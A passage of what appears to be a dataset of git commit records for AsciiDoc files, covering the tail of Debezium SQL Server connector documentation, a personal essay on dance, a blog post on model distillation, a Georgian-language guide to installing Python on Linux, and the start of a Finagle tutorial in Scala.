[io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\nconnect_1 | 2019-01-17 10:11:14,924 INFO || Schema will be changed for ChangeTable [captureInstance=dbo_customers_v2, sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\n...\nconnect_1 | 2019-01-17 10:11:33,719 INFO || Migrating schema to ChangeTable [captureInstance=dbo_customers_v2, sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\n----\n+\nEventually, the `phone_number` field is added to the schema and its value appears in messages written to the Kafka topic.\n+\n[source,json]\n----\n...\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"phone_number\"\n }\n...\n \"after\": {\n \"id\": 1005,\n \"first_name\": \"John\",\n \"last_name\": \"Doe\",\n \"email\": \"john.doe@example.com\",\n \"phone_number\": \"+1-555-123456\"\n },\n----\n\n. Drop the old capture instance by running the `sys.sp_cdc_disable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_disable_table @source_schema = 'dbo', @source_name = 'dbo_customers', @capture_instance = 'dbo_customers';\nGO\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-sql-server-connector-performance\n\/\/ Title: Monitoring {prodname} SQL Server connector performance\n[[sqlserver-monitoring]]\n== Monitoring\n\nThe {prodname} SQL Server connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\nThe connector provides the following metrics:\n\n* xref:sqlserver-snapshot-metrics[Snapshot metrics] for monitoring the connector when performing snapshots.\n* xref:sqlserver-streaming-metrics[Streaming metrics] for monitoring the connector when reading CDC table data.\n* xref:sqlserver-schema-history-metrics[Schema history metrics] for monitoring the status of the connector's schema history.\n\nFor information about how to expose the preceding metrics through JMX, see the {link-prefix}:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation].\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-snapshot-metrics\n\/\/ Title: {prodname} SQL Server connector snapshot metrics\n[[sqlserver-snapshot-metrics]]\n=== Snapshot metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=sqlserver-snapshot]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-incremental-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-streaming-metrics\n\/\/ Title: {prodname} SQL Server connector streaming metrics\n[[sqlserver-streaming-metrics]]\n=== Streaming metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=sqlserver-streaming]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-schema-history-metrics\n\/\/ Title: {prodname} SQL Server connector schema history metrics\n[[sqlserver-schema-history-metrics]]\n=== Schema history metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff8d40e1d68f77370d889efc33eaf0078d337a46","subject":"update date","message":"update date","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/dance_as_a_metaphor_of_life.adoc","new_file":"content\/writings\/dance_as_a_metaphor_of_life.adoc","new_contents":"---\ntitle: \"Dance as a metaphor of life\"\nurl: \"\/dance_as_a_metaphor_of_life\"\naliases: []\ndescription: \ndate: 2018-01-13\ndraft: true\nacknowledgement: \ncategories: [\"Writings\"]\ntags: []\npeople: []\nplaces: []\nlocations: []\n---\n\n= Dance as a metaphor of life\nAnton Podviaznikov <anton@podviaznikov.com>\n:revdate: 2018-01-14\n:docdate: 2018-01-14\n:nofooter:\n:document_type: writing\n:tags: \"\"\n\nRemember when you were a kid you could dance and enjoy it enormously even if you _didn't know how_ to dance?\r\n\r\nAfter you grow out of childhood, you lose that bliss. \r\nYou're starting to learn how to dance in the school. \r\nIt's painful, and it takes time, and it might be not fun. \r\nAnd those years are filled with effort, tears, setbacks, lost hope, varying levels of motivation, ups and downs, defeats and victories.\r\n\r\nAnd then, maybe, if you're persistent and lucky, you might rediscover the joy from your childhood again. \r\nAnd that is the point where you know how to dance as professional, and you feel it and enjoy it as a kid. \r\nThat is the integration point: your inner child integrated with an adult to form a mature creature. \r\n\r\nFor me, that is the metaphor of life. \r\nYou go from childhood - which most people enjoy, to sometimes painful period of adulthood where you to learn how to live and how to bring that joy back, \r\nand when you're done - you are a mature person. \r\nThe one, who has a deep understanding of life and know how to enjoy it and appreciate it. \r\nIt is not about just rediscovering what was lost during adulthood. \r\nIt's about bringing together all sides: mind and body and soul. \r\nIt's this three-dimensionality that gives new depth to the joy. \r\nThat is the whole point of growing up - to lose joy so you can find it again in a new broader sense and with new intensity.\n","old_contents":"---\ntitle: \"Dance as a metaphor of life\"\nurl: \"\/dance_as_a_metaphor_of_life\"\naliases: []\ndescription: \ndate: 0-00-00\ndraft: true\nacknowledgement: \ncategories: [\"Writings\"]\ntags: []\npeople: []\nplaces: []\nlocations: []\n---\n\n= Dance as a metaphor of life\nAnton Podviaznikov <anton@podviaznikov.com>\n:revdate: 2018-01-14\n:docdate: 2018-01-14\n:nofooter:\n:document_type: writing\n:tags: \"\"\n\nRemember when you were a kid you could dance and enjoy it enormously even if you _didn't know how_ to dance?\r\n\r\nAfter you grow out of childhood, you lose that bliss. \r\nYou're starting to learn how to dance in the school. \r\nIt's painful, and it takes time, and it might be not fun. \r\nAnd those years are filled with effort, tears, setbacks, lost hope, varying levels of motivation, ups and downs, defeats and victories.\r\n\r\nAnd then, maybe, if you're persistent and lucky, you might rediscover the joy from your childhood again. \r\nAnd that is the point where you know how to dance as professional, and you feel it and enjoy it as a kid. \r\nThat is the integration point: your inner child integrated with an adult to form a mature creature. \r\n\r\nFor me, that is the metaphor of life. \r\nYou go from childhood - which most people enjoy, to sometimes painful period of adulthood where you to learn how to live and how to bring that joy back, \r\nand when you're done - you are a mature person. \r\nThe one, who has a deep understanding of life and know how to enjoy it and appreciate it. \r\nIt is not about just rediscovering what was lost during adulthood. \r\nIt's about bringing together all sides: mind and body and soul. \r\nIt's this three-dimensionality that gives new depth to the joy. \r\nThat is the whole point of growing up - to lose joy so you can find it again in a new broader sense and with new intensity.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e2db9295d310ec57a1a839a8a6cddcb738d1f63b","subject":"Update 2019-09-10-Model-Distillation.adoc","message":"Update 2019-09-10-Model-Distillation.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-09-10-Model-Distillation.adoc","new_file":"_posts\/2019-09-10-Model-Distillation.adoc","new_contents":"= Model Distillation\n:hp-image: https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/carolien-van-oijen-GRlRHqEqZTc-unsplash.jpg\n:published_at: 2019-09-10\n:hp-tags: distillation, machine learning\n\n[.lead]\n*How most of the information in large models can be transferred to a small model using soft targets, and what that says about the relationship of information to the dynamics of learning.*\n\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/carolien-van-oijen-GRlRHqEqZTc-unsplash.jpg[Bee]\n\n'''\n.Recent NLP language models\n[width=\"50%\",cols=\"<,<\",frame=\"all\",grid=\"all\"]\n|===\n|*model*\n|*parameters*\n\n|BERT-base\n|110 million\n\n|BERT-large\n|340 million\n\n|Facebook XLM\n|665 million\n\n|OpenAI GPT-2\n|774 million\n|===\n'''\n\nThe upward trend of model sizes raises hurdles for the application of these models in the shape of computation and scalability, and requires decisions on the trade-off between accuracy, potency and deployability. Following reading http:\/\/www.nlp.town\/blog\/distilling-bert\/[this blog post], I decided to try to summarize (distill) the concept of model distillation, and talk about why this struck me as such an interesting idea.\n\n.Model Distillation. graphic by Anshuman Sahoo\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/distill.png[Model Distillation]\n\n'''\n\nAs shown above, the method of distillation relies on the idea of *_soft targets_* and *_softmax temperature_*.\n\n'''\n\n.Softmax Function with Temperature\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/tempsoftmax.png[Model Distillation]\n\n'''\n\nhttps:\/\/arxiv.org\/pdf\/1503.02531.pdf[Hinton et al., 2015] introduced the concept of \"softmax temperature\". The probability p~i~ of class i is calculated from the logits z. T is the temperature parameter - as you can see, setting T = 1 gives us the standard softmax function. In the paper, they also found that if the ground truth labels are available, it improves the model if the loss to optimize includes training on ground truth labels in addition to the soft target outputs of the teacher model(as shown in the figure, student loss is added to distillation loss).\n\nOn a philosophical line of thought, the paper presents an analogy of some insects in nature that optimize based on their stage-of-life requirement - larval forms to extract nutrition from environment and an adult form for travellig and reproduction; whereas cumbersome, large and often ensemble models remain the same during training and deployment. A conceptual block that may explain our hesitation of modifying trained models is our assumption that changing learned parameters may lead to loss of knowledge. Another assumption made is that the optimizing an objective function for the training set is close to optimizing the user's true objective - generalizing well to unseen data. However, ideal generalization to the user objective requires knowledge that might not be available in the training data.\n\n\n\n","old_contents":"= Model Distillation\n:hp-image: https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/carolien-van-oijen-GRlRHqEqZTc-unsplash.jpg\n:published_at: 2019-09-10\n:hp-tags: distillation, machine learning\n\n[.lead]\n*How most of the information in large models can be transferred to a small model using soft targets, and what that says about the relationship of information to the dynamics of learning.*\n\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/carolien-van-oijen-GRlRHqEqZTc-unsplash.jpg[Bee]\n\n'''\n.Recent NLP language models\n[width=\"50%\",cols=\"<,<\",frame=\"all\",grid=\"all\"]\n|===\n|*model*\n|*parameters*\n\n|BERT-base\n|110 million\n\n|BERT-large\n|340 million\n\n|Facebook XLM\n|665 million\n\n|OpenAI GPT-2\n|774 million\n|===\n'''\n\nThe upward trend of model sizes raises hurdles for the application of these models in the shape of computation and scalability, and requires decisions on the trade-off between accuracy, potency and deployability. Following reading http:\/\/www.nlp.town\/blog\/distilling-bert\/[this blog post], I decided to try to summarize (distill) the concept of model distillation, and talk about why this struck me as such an interesting idea.\n\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/distill.png[Model Distillation]\n\n'''\n\nAs shown above, the method of distillation relies on the idea of *_soft targets_* and *_softmax temperature_*.\n\n'''\n\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/tempsoftmax.png[Model Distillation]\n\n'''\n\nhttps:\/\/arxiv.org\/pdf\/1503.02531.pdf[Hinton et al., 2015] introduced the concept of \"softmax temperature\". The probability p~i~ of class i is calculated from the logits z. T is the temperature parameter - as you can see, setting T = 1 gives us the standard softmax function. In the paper, they also found that if the ground truth labels are available, it improves the model if the loss to optimize includes training on ground truth labels in addition to the soft target outputs of the teacher model(as shown in the figure, student loss is added to distillation loss).\n\nOn a philosophical line of thought, the paper presents an analogy of some insects in nature that optimize based on their stage-of-life requirement - larval forms to extract nutrition from environment and an adult form for travellig and reproduction; whereas cumbersome, large and often ensemble models remain the same during training and deployment. A conceptual block that may explain our hesitation of modifying trained models is our assumption that changing learned parameters may lead to loss of knowledge. Another assumption made is that the optimizing an objective function for the training set is close to optimizing the user's true objective - generalizing well to unseen data. However, ideal generalization to the user objective requires knowledge that might not be available in the training data.\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"28d6694e7a0e52b59dc0f7f00bd7707c092afa61","subject":"Update 2016-01-13-how-to-install-python-on-linux.adoc","message":"Update 2016-01-13-how-to-install-python-on-linux.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_contents":"= \u10e0\u10dd\u10d2\u10dd\u10e0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d6\u10d4\n:hp-alt-title: how to install python on linux\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10dc\u10d4\u10d1\u10d8\u10e1\u10db\u10d8\u10d4\u10e0 \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10d6\u10d4. \u10e0\u10dd\u10d2\u10dd\u10e0\u10d4\u10d1\u10d8\u10ea\u10d0\u10d0 \u10db\u10d0\u10d2. Windows, Unix \u10d3\u10d0 Linux \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d4\u10d1\u10d6\u10d4.\n\u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8 \u10d2\u10d6\u10d0 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d0\u10e0\u10d8\u10e1 package manager \u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0, \u10db\u10d0\u10d2. apt-get, yum, pacman \u10d3\u10d0 \u10d0.\u10e8.\n\ndebian\/ubuntu \u10d3\u10d8\u10e1\u10e2\u10e0\u10d8\u10d1\u10e3\u10e2\u10d8\u10d5\u10d4\u10d1\u10d6\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d2\u10d0\u10d5\u10e3\u10e8\u10d5\u10d0\u10d7 \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d0\n\u10db\u10d0\u10d2. \u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 2.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python2.7\n\n\u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 3.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python3.3\n \n\n\u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0 \u10e1\u10dd\u10e0\u10e1\u10d8\u10d3\u10d0\u10dc, \u10e1\u10dd\u10e0\u10e1\u10d8\u10e1 \u10d2\u10d0\u10d3\u10db\u10dd\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10d2\u10d8\u10eb\u10da\u10d8\u10d0\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d8\u10d3\u10d0\u10dc \u10d0\u10dc Ftp \u10d3\u10d0\u10dc - https:\/\/www.python.org\/ftp\/python\/ [Python Source Code] \u10d5\u10d8\u10e0\u10e9\u10d4\u10d5\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0\u10e1 3.5.1 \u10d3\u10d0 \u10d5\u10d8\u10ec\u10d4\u10e0\u10d7 *.tgz \u10e4\u10dd\u10e0\u10db\u10d0\u10e2\u10d8\u10e1 \u10e4\u10d0\u10d8\u10da\u10e1 Python-3.5.1.tgz \u10e8\u10d4\u10db\u10d3\u10d4\u10d2 \u10d5\u10ee\u10e1\u10dc\u10d8\u10d7 \u10e2\u10d4\u10e0\u10db\u10d8\u10dc\u10d0\u10da\u10e1 \u10d3\u10d0 \u10d5\u10e3\u10e8\u10d5\u10d4\u10d1\u10d7 \u10e5\u10d5\u10d4\u10db\u10dd\u10d7 \u10db\u10dd\u10ea\u10d4\u10db\u10e3\u10da \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1\n\n * wget http:\/\/python.org\/ftp\/python\/3.5.1\/Python-3.5.1.tgz\n * tar -xvf Python-3.5.1.tgz\n * cd Python-3.5.1\n * .\/configure\n * make\n * make altinstall\n \n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d8\u10e1 \u10de\u10e0\u10dd\u10ea\u10d4\u10e1\u10d8 \u10ec\u10d0\u10e0\u10db\u10d0\u10e2\u10d4\u10d1\u10d8\u10d7 \u10d3\u10d0\u10e1\u10e0\u10e3\u10da\u10d3\u10d0.\n\u10d8\u10ee. \u10e1\u10e3\u10e0\u10d0\u10d7\u10d8\nimage:: pythonge.png\n\n:hp-tags: title[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],title[\u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d8]","old_contents":"= \u10e0\u10dd\u10d2\u10dd\u10e0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d6\u10d4\n:hp-alt-title: how to install python on linux\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10dc\u10d4\u10d1\u10d8\u10e1\u10db\u10d8\u10d4\u10e0 \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10d6\u10d4. \u10e0\u10dd\u10d2\u10dd\u10e0\u10d4\u10d1\u10d8\u10ea\u10d0\u10d0 \u10db\u10d0\u10d2. Windows, Unix \u10d3\u10d0 Linux \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d4\u10d1\u10d6\u10d4.\n\u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8 \u10d2\u10d6\u10d0 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d0\u10e0\u10d8\u10e1 package manager \u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0, \u10db\u10d0\u10d2. apt-get, yum, pacman \u10d3\u10d0 \u10d0.\u10e8.\n\ndebian\/ubuntu \u10d3\u10d8\u10e1\u10e2\u10e0\u10d8\u10d1\u10e3\u10e2\u10d8\u10d5\u10d4\u10d1\u10d6\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d2\u10d0\u10d5\u10e3\u10e8\u10d5\u10d0\u10d7 \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d0\n\u10db\u10d0\u10d2. \u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 2.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python2.7\n\n\u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 3.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python3.3\n \n\n\u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0 \u10e1\u10dd\u10e0\u10e1\u10d8\u10d3\u10d0\u10dc, \u10e1\u10dd\u10e0\u10e1\u10d8\u10e1 \u10d2\u10d0\u10d3\u10db\u10dd\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10d2\u10d8\u10eb\u10da\u10d8\u10d0\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d8\u10d3\u10d0\u10dc \u10d0\u10dc Ftp \u10d3\u10d0\u10dc - https:\/\/www.python.org\/ftp\/python\/ [Python Source Code] \u10d5\u10d8\u10e0\u10e9\u10d4\u10d5\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0\u10e1 3.5.1 \u10d3\u10d0 \u10d5\u10d8\u10ec\u10d4\u10e0\u10d7 *.tgz \u10e4\u10dd\u10e0\u10db\u10d0\u10e2\u10d8\u10e1 \u10e4\u10d0\u10d8\u10da\u10e1 Python-3.5.1.tgz \u10e8\u10d4\u10db\u10d3\u10d4\u10d2 \u10d5\u10ee\u10e1\u10dc\u10d8\u10d7 \u10e2\u10d4\u10e0\u10db\u10d8\u10dc\u10d0\u10da\u10e1 \u10d3\u10d0 \u10d5\u10e3\u10e8\u10d5\u10d4\u10d1\u10d7 \u10e5\u10d5\u10d4\u10db\u10dd\u10d7 \u10db\u10dd\u10ea\u10d4\u10db\u10e3\u10da \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1\n\n * wget http:\/\/python.org\/ftp\/python\/3.5.1\/Python-3.5.1.tgz\n * tar -xvf Python-3.5.1.tgz\n * cd Python-3.5.1\n * .\/configure\n * make\n * make altinstall\n \n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d8\u10e1 \u10de\u10e0\u10dd\u10ea\u10d4\u10e1\u10d8 \u10ec\u10d0\u10e0\u10db\u10d0\u10e2\u10d4\u10d1\u10d8\u10d7 \u10d3\u10d0\u10e1\u10e0\u10e3\u10da\u10d3\u10d0.\n\n\n:hp-tags: title[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],title[\u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d8]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cce5bccb347a81a04678862d144e3eedcd6474a4","subject":"Update 2016-11-28-An-Introduction-to-Finagle-by-example.adoc","message":"Update 2016-11-28-An-Introduction-to-Finagle-by-example.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-11-28-An-Introduction-to-Finagle-by-example.adoc","new_file":"_posts\/2016-11-28-An-Introduction-to-Finagle-by-example.adoc","new_contents":"= An Introduction to Finagle by example\n<vgrente@gmail.com>\n:hp-image: \/covers\/cover.png\n:published_at: 2016-11-28\n:hp-tags: Finagle\n\nIt is a challenging task to build a large-scale web application, there are fundamental characteristics to take into account: for example, efficiency, safety and robustness. Finagle is a asynchronous, Netty based JVM RPC system made by Twitter which makes it easy to build high available clients and servers in Java and Scala. And it can even simplify your application architecture. Here I want to show you how powerful Finagle is.\n\n== Quickstart\nLet's first have a quick look about how to create a Finagle micro web service and a Finagle http client to consume this api.Create a sbt project and import dependencies.\n[source,scala]\n----\nlibraryDependencies ++= Seq( \n\"com.twitter\" %% \"finagle-http\" % \"6.38.0\", \n\"org.scalatest\" %% \"scalatest\" % \"2.2.4\" % \"test\"\n)\n----\nFirst, let's define a service. Here we define a service to receive a http request and get its url parameter as Integer then return a http response by plus 10.\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Futureimport com.twitter.finagle.http\n\nThis is a plus 10 serviceclass PlusTenService extends Service[http.Request, http.Response] {\n\n\n override def apply(request: http.Request): Future[http.Response] = { \n Future { \n val input = request.getIntParam(\"num\") \n val output = input + 10 \n val response = http.Response(request.version, http.Status.Ok) response.setContentString(output.toString) \n response } }\n}\n----\nThen initiate and start our server\n[source,scala]\n----\nimport com.twitter.finagle.{http, Service, Http}import com.twitter.util.Await\n\nobject QuickLookServer { def main(args: Array[String]): Unit = { val service: Service[http.Request, http.Response] = new PlusTenService val server = Http.serve(\":9090\", service) Await.ready(server) }}\n----\nLast let's define a client to consume this server.\n[source,scala]\n----\nimport com.twitter.finagle.{Service, Http}import com.twitter.finagle.httpimport com.twitter.util.Await\n\nobject QuickLookClient { def main(args: Array[String]): Unit = { \/\/define a client val client: Service[http.Request, http.Response] = Http.newService(\"localhost:9090\") \n\/\/define a request \nval request = http.Request(http.Method.Get, \"\/?num=5\") \n\/\/apply request on the client \nval response = client(request) \n\/\/print response \nresponse.foreach(rep => println(rep.getContentString()))\nAwait.result(response) }\n}\n----\nIf you run the two application you will see the server running on localhost:9090 and client get response 15. Simple right? As you can see our service and client are both type of Service[http.Request, http.Response] . This data type really confuse me in the beginning. I will explan what's the differences between them. \n\n== The core of Finagle\nService\n\nNow let's first have a look at the core of finagle Service[-Req, +Rep] . You can find the definition in com.twitter.finagle.Service . In Finagle 6.38.0 the definition of Service is an abstract class, in previous version it was a trait\n[source,scala]\n----\nabstract class Service[-Req, +Rep] extends (Req => Future[Rep])\n----\nA service is a function that takes request of type Req, and return a response of Future of Rep. This Services type are used to represent both clients and servers. To answer my previous question, the differences between service and client is that a Finagle client \u201cimports\u201d a Service from the network. However, a Finagle server \u201cexports\u201d a Service to the network.Note: the Future here is twitter future not scala future. There is no differences on conception.\n\nFilter\n\nSome times we want to add application-agnostic behaviour, we can use Filter to achieve this.\n[source,scala]\n----\nabstract class Filter[-ReqIn, +RepOut, +ReqOut, -RepIn] \nextends ((ReqIn, Service[ReqOut, RepIn]) \n=> Future[RepOut])\n----\n\nimage\n\nIf it is not clear please check image below.\n\nimage\n\nIn most common cases, ReqIn is equal to ReqOut, and RepIn is equal to RepOut. So we have this SimpleFilter class\n\n[source,scala]\n----\nabstract class SimpleFilter[Req, Rep] extends Filter[Req, Rep, Req, Rep]\n----\nA filter can attached to client and server side. Let's try to implement a simple timeout filter.\n[source,scala]\n----\nimport com.twitter.finagle.{SimpleFilter, Service}import com.twitter.util.{Duration, Timer, Future}\n\nclass TimeoutFilter[Req, Rep](timeout: Duration, timer: Timer)\nextends SimpleFilter[Req, Rep] {\n\n def apply(request: Req, service: Service[Req, Rep]): Future[Rep] = { \n val res = service(request) \n res.within(timer, timeout) }\n }\n----\nHere, a timeout filter is a class extends SimpleFilter trait. Below is how to use this filter on client side\n[source,scala]\n----\nclient = Http.newService(\"localhost:9090\")\n\nval timeoutFilter = new TimeoutFilter[http.Request, http.Response](Duration.fromSeconds(1),\nnew JavaTimer(false))\n\nval clientWithTimeoutFilter = timeoutFilter.andThen(quickLookClient)\n----\n\nA filter can be applied on server side too. Here is an example. First let's define a filter.\n\n[source,scala]\n----\nclass CountFilter[Req, Rep](countClient: Service[http.Request, http.Response])\nextends SimpleFilter[Req, Rep]\n{ override def apply(request: Req, service: Service[Req, Rep]): Future[Rep] = \n{ val countRequest = http.Request(http.Method.Post, \"\/?count=5\") countClient(countRequest) service(request) }}\n----\nAnd then let's use it on our plusTen service\n[source,scala]\n----\nal service: Service[http.Request, http.Response] = new PlusTenService\n\nval countClient = Http.newService(\"localhost:9010\")\n\nval countFilter = new CountFilter[http.Request, http.Response](countClient)\n\nval serviceWithCountFilter = countFilter.andThen(service)\n----\nYou may notice the way to chain filter and service together is by using andThen method. Actually andThen method can not only chain filter with service but also chain multiple filters, like filter1 andThen filter2 andThen myservice \n\n## Client\nThis is the part that I like the most in finagle. Finagle http client is designed to maximize success and minimize latency. Each request will flow through various modules. These modules are logically separated into three stacks: Client stack, Endpoint stack, connection stack.\n\n*Client stack*\n\nmanages name resolution and balances requests across multiple endpoints.\n\n*Endpoint stack*\n\nprovides circuit breakers and connection pooling.\n\n*connection stack*\n\nprovides connection life-cycle management and implements the wire protocol.\n\nTo use finagle http client is very simple. Define a client first and define a http request, then apply request on the client.\n\n[source,scala]\n----\n\/\/ create a http clientval client = \nHttp.client.newService(\"example.com:80\")\n\/\/ create a http requestval req =\nRequest(\"\/foo\", (\"my-query-string\", \"bar\")\n)\n\/\/ apply request on the clientval resp: Future[Response] = 